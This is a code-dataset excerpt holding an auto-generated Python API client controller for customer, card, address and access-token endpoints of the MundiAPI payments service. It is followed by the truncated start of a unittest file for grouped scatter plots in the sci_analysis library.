| 38,966
|
py
|
Python
|
mundiapi/controllers/customers_controller.py
|
mundipagg/MundiAPI-PYTHON
|
8bf5a063fe32c9995d6f1964765fe60cae83af19
|
[
"MIT"
] | 10
|
2017-08-30T15:53:00.000Z
|
2021-02-11T18:06:56.000Z
|
mundiapi/controllers/customers_controller.py
|
mundipagg/MundiAPI-PYTHON
|
8bf5a063fe32c9995d6f1964765fe60cae83af19
|
[
"MIT"
] | 3
|
2020-02-20T08:24:05.000Z
|
2021-07-22T14:18:33.000Z
|
mundiapi/controllers/customers_controller.py
|
mundipagg/MundiAPI-PYTHON
|
8bf5a063fe32c9995d6f1964765fe60cae83af19
|
[
"MIT"
] | 7
|
2017-04-27T13:46:52.000Z
|
2021-04-14T13:44:23.000Z
|
# -*- coding: utf-8 -*-
"""
mundiapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
from mundiapi.api_helper import APIHelper
from mundiapi.configuration import Configuration
from mundiapi.controllers.base_controller import BaseController
from mundiapi.http.auth.basic_auth import BasicAuth
from mundiapi.models.get_access_token_response import GetAccessTokenResponse
from mundiapi.models.get_customer_response import GetCustomerResponse
from mundiapi.models.list_access_tokens_response import ListAccessTokensResponse
from mundiapi.models.list_addresses_response import ListAddressesResponse
from mundiapi.models.get_address_response import GetAddressResponse
from mundiapi.models.get_card_response import GetCardResponse
from mundiapi.models.list_cards_response import ListCardsResponse
from mundiapi.models.list_customers_response import ListCustomersResponse
class CustomersController(BaseController):
"""A Controller to access Endpoints in the mundiapi API."""
def create_access_token(self,
customer_id,
request,
idempotency_key=None):
"""Does a POST request to /customers/{customer_id}/access-tokens.
Creates a access token for a customer
Args:
customer_id (string): Customer Id
request (CreateAccessTokenRequest): Request for creating a access
token
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetAccessTokenResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/access-tokens'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAccessTokenResponse.from_dictionary)
def update_customer(self,
customer_id,
request,
idempotency_key=None):
"""Does a PUT request to /customers/{customer_id}.
Updates a customer
Args:
customer_id (string): Customer id
request (UpdateCustomerRequest): Request for updating a customer
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCustomerResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.put(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCustomerResponse.from_dictionary)
def delete_access_tokens(self,
customer_id):
"""Does a GET request to /customers/{customer_id}/access-tokens/.
Delete a Customer's access tokens
Args:
customer_id (string): Customer Id
Returns:
ListAccessTokensResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/access-tokens/'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ListAccessTokensResponse.from_dictionary)
def get_customer(self,
customer_id):
"""Does a GET request to /customers/{customer_id}.
Get a customer
Args:
customer_id (string): Customer Id
Returns:
GetCustomerResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCustomerResponse.from_dictionary)
def get_addresses(self,
customer_id,
page=None,
size=None):
"""Does a GET request to /customers/{customer_id}/addresses.
Gets all adressess from a customer
Args:
customer_id (string): Customer id
page (int, optional): Page number
size (int, optional): Page size
Returns:
ListAddressesResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/addresses'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_parameters = {
'page': page,
'size': size
}
_query_builder = APIHelper.append_url_with_query_parameters(_query_builder,
_query_parameters, Configuration.array_serialization)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ListAddressesResponse.from_dictionary)
def get_access_token(self,
customer_id,
token_id):
"""Does a GET request to /customers/{customer_id}/access-tokens/{token_id}.
Get a Customer's access token
Args:
customer_id (string): Customer Id
token_id (string): Token Id
Returns:
GetAccessTokenResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/access-tokens/{token_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'token_id': token_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAccessTokenResponse.from_dictionary)
def get_address(self,
customer_id,
address_id):
"""Does a GET request to /customers/{customer_id}/addresses/{address_id}.
Get a customer's address
Args:
customer_id (string): Customer id
address_id (string): Address Id
Returns:
GetAddressResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/addresses/{address_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'address_id': address_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAddressResponse.from_dictionary)
def create_card(self,
customer_id,
request,
idempotency_key=None):
"""Does a POST request to /customers/{customer_id}/cards.
Creates a new card for a customer
Args:
customer_id (string): Customer id
request (CreateCardRequest): Request for creating a card
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCardResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/cards'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCardResponse.from_dictionary)
def renew_card(self,
customer_id,
card_id,
idempotency_key=None):
"""Does a POST request to /customers/{customer_id}/cards/{card_id}/renew.
Renew a card
Args:
customer_id (string): Customer id
card_id (string): Card Id
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCardResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/cards/{card_id}/renew'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'card_id': card_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.post(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCardResponse.from_dictionary)
def create_customer(self,
request,
idempotency_key=None):
"""Does a POST request to /customers.
Creates a new customer
Args:
request (CreateCustomerRequest): Request for creating a customer
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCustomerResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers'
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCustomerResponse.from_dictionary)
def update_address(self,
customer_id,
address_id,
request,
idempotency_key=None):
"""Does a PUT request to /customers/{customer_id}/addresses/{address_id}.
Updates an address
Args:
customer_id (string): Customer Id
address_id (string): Address Id
request (UpdateAddressRequest): Request for updating an address
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetAddressResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/addresses/{address_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'address_id': address_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.put(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAddressResponse.from_dictionary)
def get_access_tokens(self,
customer_id,
page=None,
size=None):
"""Does a GET request to /customers/{customer_id}/access-tokens.
Get all access tokens from a customer
Args:
customer_id (string): Customer Id
page (int, optional): Page number
size (int, optional): Page size
Returns:
ListAccessTokensResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/access-tokens'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_parameters = {
'page': page,
'size': size
}
_query_builder = APIHelper.append_url_with_query_parameters(_query_builder,
_query_parameters, Configuration.array_serialization)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ListAccessTokensResponse.from_dictionary)
def update_customer_metadata(self,
customer_id,
request,
idempotency_key=None):
"""Does a PATCH request to /Customers/{customer_id}/metadata.
Updates the metadata a customer
Args:
customer_id (string): The customer id
request (UpdateMetadataRequest): Request for updating the customer
metadata
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCustomerResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/Customers/{customer_id}/metadata'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.patch(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCustomerResponse.from_dictionary)
def delete_address(self,
customer_id,
address_id,
idempotency_key=None):
"""Does a DELETE request to /customers/{customer_id}/addresses/{address_id}.
Delete a Customer's address
Args:
customer_id (string): Customer Id
address_id (string): Address Id
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetAddressResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/addresses/{address_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'address_id': address_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.delete(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAddressResponse.from_dictionary)
def update_card(self,
customer_id,
card_id,
request,
idempotency_key=None):
"""Does a PUT request to /customers/{customer_id}/cards/{card_id}.
Updates a card
Args:
customer_id (string): Customer Id
card_id (string): Card id
request (UpdateCardRequest): Request for updating a card
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCardResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/cards/{card_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'card_id': card_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.put(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCardResponse.from_dictionary)
def get_cards(self,
customer_id,
page=None,
size=None):
"""Does a GET request to /customers/{customer_id}/cards.
Get all cards from a customer
Args:
customer_id (string): Customer Id
page (int, optional): Page number
size (int, optional): Page size
Returns:
ListCardsResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/cards'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_parameters = {
'page': page,
'size': size
}
_query_builder = APIHelper.append_url_with_query_parameters(_query_builder,
_query_parameters, Configuration.array_serialization)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ListCardsResponse.from_dictionary)
def delete_card(self,
customer_id,
card_id,
idempotency_key=None):
"""Does a DELETE request to /customers/{customer_id}/cards/{card_id}.
Delete a customer's card
Args:
customer_id (string): Customer Id
card_id (string): Card Id
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetCardResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/cards/{card_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'card_id': card_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.delete(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCardResponse.from_dictionary)
def get_customers(self,
name=None,
document=None,
page=1,
size=10,
email=None,
code=None):
"""Does a GET request to /customers.
Get all Customers
Args:
name (string, optional): Name of the Customer
document (string, optional): Document of the Customer
page (int, optional): Current page the the search
size (int, optional): Quantity pages of the search
email (string, optional): Customer's email
code (string, optional): Customer's code
Returns:
ListCustomersResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers'
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_parameters = {
'name': name,
'document': document,
'page': page,
'size': size,
'email': email,
'Code': code
}
_query_builder = APIHelper.append_url_with_query_parameters(_query_builder,
_query_parameters, Configuration.array_serialization)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, ListCustomersResponse.from_dictionary)
def delete_access_token(self,
customer_id,
token_id,
idempotency_key=None):
"""Does a DELETE request to /customers/{customer_id}/access-tokens/{token_id}.
Delete a customer's access token
Args:
customer_id (string): Customer Id
token_id (string): Token Id
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetAccessTokenResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/access-tokens/{token_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'token_id': token_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.delete(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAccessTokenResponse.from_dictionary)
def create_address(self,
customer_id,
request,
idempotency_key=None):
"""Does a POST request to /customers/{customer_id}/addresses.
Creates a new address for a customer
Args:
customer_id (string): Customer Id
request (CreateAddressRequest): Request for creating an address
idempotency_key (string, optional): TODO: type description here.
Example:
Returns:
GetAddressResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/addresses'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8',
'idempotency-key': idempotency_key
}
# Prepare and execute request
_request = self.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(request))
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetAddressResponse.from_dictionary)
def get_card(self,
customer_id,
card_id):
"""Does a GET request to /customers/{customer_id}/cards/{card_id}.
Get a customer's card
Args:
customer_id (string): Customer id
card_id (string): Card id
Returns:
GetCardResponse: Response from the API.
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/customers/{customer_id}/cards/{card_id}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'customer_id': customer_id,
'card_id': card_id
})
_query_builder = Configuration.base_uri
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.http_client.get(_query_url, headers=_headers)
BasicAuth.apply(_request)
_context = self.execute_request(_request)
self.validate_response(_context)
# Return appropriate type
return APIHelper.json_deserialize(_context.response.raw_body, GetCardResponse.from_dictionary)
| 36.348881
| 118
| 0.59847
| 3,908
| 38,966
| 5.687308
| 0.041453
| 0.05984
| 0.039683
| 0.047242
| 0.908531
| 0.900297
| 0.892828
| 0.886439
| 0.88113
| 0.870692
| 0
| 0.000541
| 0.335498
| 38,966
| 1,071
| 119
| 36.38282
| 0.857838
| 0.341426
| 0
| 0.821739
| 1
| 0
| 0.093851
| 0.033036
| 0
| 0
| 0
| 0.011204
| 0
| 1
| 0.045652
| false
| 0
| 0.026087
| 0
| 0.119565
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c4df900efd9eb3f0aec47618de0d51d034cbd492
| 27,255
|
py
|
Python
|
sci_analysis/test/test_graph_groupscatter.py
|
cmmorrow/sci-analysis
|
de65ba29fe210eb950daa3dbc2e956963a4770ef
|
[
"MIT"
] | 17
|
2017-05-10T18:25:36.000Z
|
2021-12-23T14:43:49.000Z
|
sci_analysis/test/test_graph_groupscatter.py
|
cmmorrow/sci-analysis
|
de65ba29fe210eb950daa3dbc2e956963a4770ef
|
[
"MIT"
] | 57
|
2016-08-22T23:58:05.000Z
|
2019-07-31T06:54:22.000Z
|
sci_analysis/test/test_graph_groupscatter.py
|
cmmorrow/sci-analysis
|
de65ba29fe210eb950daa3dbc2e956963a4770ef
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
import pandas as pd
import scipy.stats as st
from os import path, getcwd
from ..graphs import GraphGroupScatter
from ..data import Vector
from ..analysis.exc import NoDataError
from ..data import UnequalVectorLengthError
class MyTestCase(unittest.TestCase):
@property
def save_path(self):
if getcwd().split('/')[-1] == 'test':
return './images/'
elif getcwd().split('/')[-1] == 'sci_analysis':
if path.exists('./setup.py'):
return './sci_analysis/test/images/'
else:
return './test/images/'
else:
'./'
def test_1_scatter_two_groups_default(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'],
save_to='{}test_group_scatter_1'.format(self.save_path)))
def test_2_scatter_two_groups_no_fit(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], fit=False,
save_to='{}test_group_scatter_2'.format(self.save_path)))
def test_3_scatter_two_groups_no_points(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], points=False,
save_to='{}test_group_scatter_3'.format(self.save_path)))
def test_4_scatter_two_groups_highlight_one(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight=[2],
save_to='{}test_group_scatter_4'.format(self.save_path)))
def test_5_scatter_three_groups_highlight_two(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
input_3_x = st.norm.rvs(size=100)
input_3_y = np.array([(x * 1.5) + st.norm.rvs(size=100)[0] for x in input_3_x]) - 0.5
grp = [1] * 100 + [2] * 100 + [3] * 100
cs_x = np.concatenate((input_1_x, input_2_x, input_3_x))
cs_y = np.concatenate((input_1_y, input_2_y, input_3_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight=[2, 3],
save_to='{}test_group_scatter_5'.format(self.save_path)))
def test_6_scatter_two_groups_highlight_one_no_points(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
cs_x = np.concatenate((input_1_x, input_2_x))
cs_y = np.concatenate((input_1_y, input_2_y))
input_array = pd.DataFrame({'a': cs_x, 'b': cs_y, 'c': grp})
self.assertTrue(GraphGroupScatter(input_array['a'], input_array['b'], groups=input_array['c'], highlight=[2],
points=False, save_to='{}test_group_scatter_6'.format(self.save_path)))
def test_7_scatter_two_groups_highlight_one_no_fit(self):
np.random.seed(987654321)
input_1_x = st.norm.rvs(size=100)
input_1_y = [x + st.norm.rvs(0, 0.5, size=1)[0] for x in input_1_x]
input_2_x = st.norm.rvs(size=100)
input_2_y = [(x / 2) + st.norm.rvs(0, 0.2, size=1)[0] for x in input_2_x]
grp = [1] * 100 + [2] * 100
